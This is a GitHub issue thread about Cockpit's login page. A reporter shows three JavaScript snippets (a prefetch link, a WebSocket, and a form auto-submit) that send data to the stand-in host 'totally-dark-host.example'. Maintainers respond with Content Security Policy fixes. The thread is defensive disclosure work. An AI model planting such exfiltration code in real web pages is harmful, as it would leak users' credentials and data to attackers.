### ISSUE TITLE
Potential security risk

### ISSUE THREAD

**Issue by sabbaka** [cockpit-project/cockpit#8419]
According to[ this article ](https://hackernoon.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5)I've made some checks of Cockpit's login page.
I've been using Python HTTP server and Python WebSocket server to see if requests are arriving.
Also, I've set totally-dark-host.example to 127.0.0.1.
I've put code into script tag on src/ws/login.html
These are code examples which worked:

```
            const linkEl = document.createElement('link');
            linkEl.rel = 'prefetch';
            linkEl.href = "http://totally-dark-host.example:8080/index.css";
            document.head.appendChild(linkEl);
```

```
            var connection = new WebSocket('ws://totally-dark-host.example:8000');
```

```
            var f = document.createElement("form");
            f.setAttribute('method',"post");
            f.setAttribute('action',"http://totally-dark-host.example:8080/");

            var i = document.createElement("input");
            i.setAttribute('type',"text");
            i.setAttribute('name','payload');
            i.setAttribute('value',payload);

            f.appendChild(i);

            document.getElementsByTagName('body')[0].appendChild(f);
            f.submit();
```

**Comment by stefwalter** [comment]
So lets split this out. The following does not work for me on any Cockpit page in Firefox, but it does in Chrome.

```
            const linkEl = document.createElement('link');
            linkEl.rel = 'prefetch';
            linkEl.href = "http://totally-dark-host.example:8080/index.css";
            document.head.appendChild(linkEl);
```

The other cases seem to be flaws in our default content security policy. We should fix them.

**Comment by stefwalter** [comment]
I believe the following changes need to happen to our CSP:

Add the following:

 * form-action 'self'
 * base-uri 'self'
 * object-src 'none'

Fix the following:

 * connect-src should not refer to ws: or wss: but to 'self' somehow

Maybe add the following:

 * block-all-mixed-content

And we should add the following headers:

 * Referrer-Policy: no-referrer
 * X-DNS-Prefetch-Control: off

**Comment by stefwalter** [comment]
Spec discussion about 'prefetch': https://github.com/w3c/webappsec-csp/issues/107

**Comment by stefwalter** [comment]
So after working on this and thinking about it further I've come to the following conclusion:

Our usage of CSP is to prevent malicious code from running at all. Once it is running (eg: if installed) during a Linux session, CSP can do little to prevent it from sending information elsewhere. Such code could simply use ```cockpit.http``` or spawn the ```nc``` or ```curl``` command in order to transmit information.

We cannot prevent mallicious and injected code from leaking information off the host. Once the dangerous code has made it into Cockpit itself (such as javascript loaded from an NPM module, or malicious javascript packages are installed in ```/usr/share/cockpit```) the javascript can run tools on the host in order to transmit information anywhere.

The code run after a Cockpit login is part of a Linux session, and must be trusted as such. Just as you must trust the shell scripts you run from an SSH terminal.

Nevertheless, I have done work in #8512 to tighten up the CSP and protect against what is shown here. The exception, as noted before, is that Chrome/Chromium does not allow us to control prefetching behavior with headers or CSP.

By tightening up CSP and headers, we provide some additional obstacles to accidental leakage of sensitive information by code. However by itself this tightening up of CSP does not prevent an actual attack.

**Comment by martinpitt** [comment]
PR #8512 tightens this up as much as possible, and it's not really a security issue due to the reasons above. So it seems this can be closed.
